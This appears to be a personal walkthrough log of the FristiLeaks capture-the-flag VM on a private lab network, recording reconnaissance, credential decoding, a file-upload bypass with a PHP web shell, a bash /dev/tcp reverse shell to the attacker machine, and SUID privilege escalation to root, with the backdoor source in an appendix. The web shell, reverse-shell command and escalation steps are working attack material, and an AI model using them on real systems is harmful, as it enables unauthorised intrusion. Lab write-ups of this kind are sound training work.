host: 192.168.56.1
dhcp-server: 192.168.56.100
kali: 192.168.56.101
* log
# 2015/12/24 14:45 -> 16:30 (1hr 45min)
# 2015/12/25 15:00 -> 17:45 (2hr 45min)
# total time = 4hrs 30min
* discovery - target
* nmap --min-parallelism=100 -sP -T5 192.168.56.0/24
* found target: 192.168.56.102
* discovery - services
* nmap --min-parallelism=100 -A -T5 -p1-65535 192.168.56.102
* found ports: 80
* enumerate port 80
* wget http://192.168.56.102
* cat index.html
* wget http://192.168.56.102/images/keep-calm.png
* wget http://192.168.56.102/robots.txt
* robots.txt: disallow /cola /sisi /beer
* wget http://192.168.56.102/cola/
* since its not the URL, and we should drink fristi
* wget http://192.168.56.102/fristi/
* cat index.html
* read description meta tag reg comment about base64
* noticed second commented out base64
* suspect username: eezeepz
* extracted commented out line using vi
* deleted other lines
* joined all lines (:%j)
* removed spaces (:%s/\ //g)
* saved into fristi_img2.txt
* base64 -d fristi_img2.txt > img2
* file img2
* mv img2 img2.png
* suspect password: keKkeKKeKKeKkEkkEk
* access
* http://192.168.56.102/fristi/
* myusername: eezeepz, mypassword: keKkeKKeKKeKkEkkEk
* logged into http://192.168.56.102/fristi/login_success.php
* clicked upload file link to http://192.168.56.102/fristi/upload.php
* uploaded img2.png and got message regarding /uploads
* verified upload location http://192.168.56.102/fristi/uploads/img2.png
* attempted shell access using weevely (failed)
* generated weevely shell: weevely generate password shell.php
* cp /usr/share/weevely/shell.php .
* attempted upload: only allowed png,jpg,gif
* mv shell.php shell.gif
* uploaded and connected
* weevely http://192.168.56.102/fristi/uploads/shell.gif password
* fixed pythong issues
* tar zxvf PySocks-1.5.6.tar.gz
* cd PySocks-1.5.6/
* ./setup.py build
* ./setup.py install
* weevely http://192.168.56.102/fristi/uploads/shell.gif password
* unable to connect
* used old script to execute commands
* renamed to shell.php.jpg
* uploaded file
* curl http://192.168.56.102/fristi/uploads/shell.php.jpg?cmd=id
* uid=48(apache) gid=48(apache) groups=48(apache)
* curl http://192.168.56.102/fristi/uploads/shell.php.jpg -d cmd="cat /etc/passwd"
* found: eezeepz, admin, fristigod, fristi
* ls -l /home/
* found: drwx---r-x. on eezeepz
* ls -l /home/eezeepz
* found:
* notes.txt
* commands (various)
* cat /home/eezeepz/notes.txt
* found:
* cron runs /tmp/runthis with admin privileges every minute
* commands chmod, df, cat, echo, ps, grep, egrep in /home/admin
* access to /usr/bin/*
* changed access to /home/admin
* curl http://192s/shell.php.jpg -d cmd="echo '/home/admin/chmod 755 /home/admin/' > /tmp/runthis"
* ls -las /home/admin/
* found: cryptedpass.txt, cryptpass.py, and whoisyourgodnow.txt (owner by fristigod)
* cat /home/admin/whoisyourgodnow.txt
* found: =RFn0AKnlMHMPIzpyuTI0ITG
* cat /home/admin/cryptedpass.txt
* found: mVGZ3O3omkJLmy2pcuTq
* cat /home/admin/cryptpass.py
* found:
* function does base64 then rot13
* created own script to decrypt password
* python ./decryptpass.py mVGZ3O3omkJLmy2pcuTq
* found: thisisalsopw123
* python ./decryptpass.py =RFn0AKnlMHMPIzpyuTI0ITG
* found: LetThereBeFristi!
* interactive shell
* got tired of using the php script and decided to get interactive shell
* on kali: nc -n -vvv -l -p 80
* ran via php: /bin/bash -i > /dev/tcp/192.168.56.101/80 0<&1 2>&1, but encoded for url as %2Fbin%2Fbash%20-i%20%3E%20%2Fdev%2Ftcp%2F192.168.56.101%2F80%200%3C%261%202%3E%261
* now have shell (without TTY, so cannot use su yet)
* find files owned by users
* find / -user eezeepz 2>&1 | grep -v "Permission denied"
* find / -user admin 2>&1 | grep -v "Permission denied"
* find / -user fristi 2>&1 | grep -v "Permission denied"
* find / -user fristigod 2>&1 | grep -v "Permission denied"
* found: /var/fristigod
* found: empty mailboxes
* found: /var/www/notes.txt
* not very useful since we already figured this out
* tried to get tty shell
// https://pen-testing.sans.org/blog/2014/07/08/sneaky-stealthy-su-in-web-shells
// http://netsec.ws/?p=337
* /usr/bin/python -c 'import pty; pty.spawn("/bin/sh")'
* used: su fristigod and password: LetThereBeFristi!
* cd /var/fristigod
* ls -las
* found: .bash_history and .secret_admin_stuff
* cat .bash_history
* found: sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
* ls -las /var/fristigod/.secret_admin_stuff/
* found: suid/guid set on doCom file and owned by root:root
* file /var/fristigod/.secret_admin_stuff/doCom
* strings /var/fristigod/.secret_admin_stuff/doCom
* sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
* found: Usage: ./program_name terminal_command ...
* sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id
* found: uid=0(root) gid=100(users) groups=100(users),502(fristigod)
* sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom bash
!! got root !!
* found: cat /root/fristileaks_secrets.txt
* cat /root/fristileaks_secrets.txt
* found: Flag: Y0u_kn0w_y0u_l0ve_fr1st1
# Other
* /root/.c has source for doCom
* cat /root/.mysql_history
* appendix
// http://snipplr.com/view/72936/simple-php-backdoor-shell/
-- start of old script --
<?php
if(isset($_REQUEST['cmd']))
{
$cmd = $_REQUEST['cmd'];
system($cmd);
echo "<pre>$cmd</pre>";
}
else
{
echo "<pre>usage: ?cmd=</pre>";
}
?>
-- end of old script
// modified cryptpass.py script
-- start of decryptpass.py script --
import base64,codecs,sys
#def encodeString(str):
# base64string= base64.b64encode(str)
# return codecs.encode(base64string[::-1], 'rot13')
def decodeString(str):
rottedString= codecs.encode(str[::-1], 'rot13')
return base64.b64decode(rottedString)
#cryptoResult=encodeString(sys.argv[1])
#print cryptoResult
#decryptedResult=decodeString(cryptoResult)
#print decryptedResult
decryptedResult=decodeString(sys.argv[1])
print decryptedResult
-- end of decryptpass.py script --